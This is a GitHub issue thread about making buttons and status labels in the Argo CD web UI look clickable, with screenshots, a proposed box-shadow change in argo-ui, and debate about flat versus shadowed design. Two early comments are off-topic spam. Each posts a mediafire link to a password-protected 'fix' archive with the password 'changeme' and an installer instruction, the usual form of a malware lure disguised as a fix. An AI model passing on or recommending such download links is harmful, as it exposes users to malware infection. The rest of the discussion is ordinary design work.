### ISSUE TITLE
Make buttons in the UI looks more like clickable buttons rather than labels

### ISSUE THREAD

**Issue by andrii-korotkov-verkada** [argoproj/argo-cd#19698]
# Summary

The buttons on the top (like Details or Refresh) and labels like Sync OK and revision name in Sync status can be remade to have a more 3D style, so it's more obvious those are clickable things.
![Screenshot 2024-08-27 at 8 01 38 AM](https://github.com/user-attachments/assets/3f3b6307-aee7-4769-a08f-0cb4f0dd45bd)
![Screenshot 2024-08-27 at 8 01 41 AM](https://github.com/user-attachments/assets/c1b9cee7-8f9b-4d9a-b105-b72ec6fa3151)

# Motivation

Based on a feedback of UI engineer new to ArgoCD, it wasn't obvious those are clickable until I showed it during the Demo. Those look more like labels, especially the Sync status button which doesn't have a border.

# Proposal

Make the buttons have more of 3D style, or other way to look more like clickable objects. For the Sync OK button and revision name in Sync status they need some border added.

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by keithchong** [comment]
Like this?  It's a one line change in argo-ui, but there is talk about deprecating it.

<img width="926" alt="Screenshot 2024-08-29 at 11 47 07 AM" src="https://github.com/user-attachments/assets/d61f9c27-bc59-4057-9596-4b7760767065">

**Comment by andrii-korotkov-verkada** [comment]
@keithchong, yes, that would be great. If argo-ui is being deprecated, what's the people's proposed path forward with ui?

**Comment by ebuildy** [comment]
My 2 cents !

<img width="987" alt="Capture d’écran, le 2024-11-30 à 18 15 35" src="https://github.com/user-attachments/assets/273f3004-a2dd-4a53-83ed-7fe056908c5e">

**Comment by surajyadav1108** [comment]
@keithchong @andrii-korotkov-verkada is this change needed? keithchongs change looks right to me.

**Comment by andrii-korotkov-verkada** [comment]
I'd say it's needed.

**Comment by andrii-korotkov-verkada** [comment]
@keithchong, can you raise a PR for your change, please?

**Comment by keithchong** [comment]
I've created a PR in Argo-UI to add the box-shadow style to Argo Buttons.  See https://github.com/argoproj/argo-ui/pull/586.  Once that is merged, the Argo CD-specific PR can be created.

The shadow might affect other Argo Projects that depend on the Argo Buttons. Argo Workflows is one that uses the `argo-button--base` style.  I don't see Argo Rollouts using it.  The additional shadow might result in some minor layout adjustments.  For example, the buttons for each application tile card are cut-off at the bottom, so additional changes are needed in Argo CD.

Button truncation if shadow style is _only_ applied
<img width="384" alt="Image" src="https://github.com/user-attachments/assets/94ebe956-5225-4f11-9454-6661e4863682" />

There are also the Argo CD specific changes for the the status panel, since the status label and icon are clickable, as mentioned in the problem definition.

So, the fix will directly address the basic issue of this problem, and will try to honour the original colour scheme.  Certainly, as mentioned by @ebuildy in the comment above, other stylistic choices, colours and designs can be applied separately.  They still can be done by the [custom styles](https://argo-cd.readthedocs.io/en/stable/operator-manual/custom-styles/#custom-styles) feature.

Also, the tree resource view is still 'flat'.  The drop-down '...' button is still flat, compared to the 'More' '...' button in the status panel.

Application List Page
<img width="1152" alt="Image" src="https://github.com/user-attachments/assets/975c155a-d0a8-413c-a7e2-25a0ef9c3cf0" />

Application Details Status Panel.  I decided to make the status icon a button because the border around the icon and text looked strange and inconsistent because of the varying lengths.   The status text is no longer clickable.  The SHA is only annotated by the link icon.  The "More" button has the shadow effect.  See the following screenshot. 

<img width="1349" alt="Image" src="https://github.com/user-attachments/assets/6fe83333-9dfa-4774-ba7b-f54346230b93" />

<img width="290" alt="Image" src="https://github.com/user-attachments/assets/c271844f-bd0f-448f-97ac-aa3119bb627c" />

Banner Buttons.  Note in this screenshot, the Sync Status icon is not a button, because there is no other info to display.
<img width="1133" alt="Image" src="https://github.com/user-attachments/assets/3c34c7d9-63eb-43c2-8934-0cd970e24a16" />

New App Panel (Cancel button colour remains the same)

<img width="590" alt="Image" src="https://github.com/user-attachments/assets/47d05530-a01d-4aaf-881d-0452a5ff62a4" />


App Conditions - Error

<img width="1185" alt="Image" src="https://github.com/user-attachments/assets/728037d8-d4b7-4a1f-b633-88f441d98067" />

App Conditions - Warning

<img width="1358" alt="Image" src="https://github.com/user-attachments/assets/29d80545-8308-40ef-a4ab-76a61767e80e" />

Login Page

<img width="323" alt="Image" src="https://github.com/user-attachments/assets/b4add7ba-31f4-4700-9a58-0c3182d26711" />

Dark Theme

<img width="1367" alt="Image" src="https://github.com/user-attachments/assets/de8389a8-a3ac-41a5-95cc-6588bc044279" />

**Comment by jsoref** [comment]
I'm looking at https://github.com/argoproj/argo-cd/issues/19698#issuecomment-2698785630

Technically, I think that 3d styles are mostly on the "out" (certainly GitHub doesn't use them)

* Windows 11 is certainly flat: https://learn.microsoft.com/en-us/windows/apps/design/
* I think I'd characterize macOS as _mostly_ flat https://www.figma.com/community/file/1251588934545918753/apple-design-resources-macos -- floating dialogs (Spotlight, find boxes) are an exception
* Chrome (at least on macOS) is fairly flat; it has a floating find dialog, and uses material cards with shadows, but in general, buttons don't have shadows https://m3.material.io/components/dialogs/overview


The extra borders remind me of a style from a long time ago (I'm having trouble thinking back to the precise era).

That said, it might kinda work.

Note that the widgets to the left of `log in`/`log out` are buttons, so I'd expect them to have some effect if we're outlining/shadowing things.

I think the reason modern designers have turned against shadows/borders is that they make things too busy.

**Comment by keithchong** [comment]
@jsoref , I think ideally, we should move to another framework (eg Patternfly), and [deprecate](https://github.com/argoproj/argo-cd/issues/19698#issuecomment-2318214349) argo-ui. Essentially, the Argo UI is based on a non-standard library.  I do agree with your comments, and I left the graphical view flat.  This change is to honour the original design and colours, and the intent more so is to address the problem definition without changing the styles drastically.   We could leave the buttons as is and try to address only the status panel?  @andrii-korotkov-verkada what are your thoughts?

**Comment by andrii-korotkov-verkada** [comment]
I think it's just not obvious to people that some things are clickable, such as Sync OK/Failed especially. I personally like the buttons just like you posted before. I suggest we bring this up at the contributors meeting and/or #argo-cd-contributors Slack and have some vote. We can also include it in 3.0.0-rc1 and revert if get too much negative feedback and not much positive.

**Comment by andrii-korotkov-verkada** [comment]
@keithchong, looks like at exactly the 100% zoom a part of rectangle is cut off, doesn't repro on a bit smaller or larger zooms.
![Image](https://github.com/user-attachments/assets/37a6972c-2c4e-4107-bd38-63cc2d13f91e)

**Comment by Princeman2** [comment]
Hi, I’d like to work on this. I have experience with Argo CD from my personal projects and Azure/Kubernetes. Is this still open?
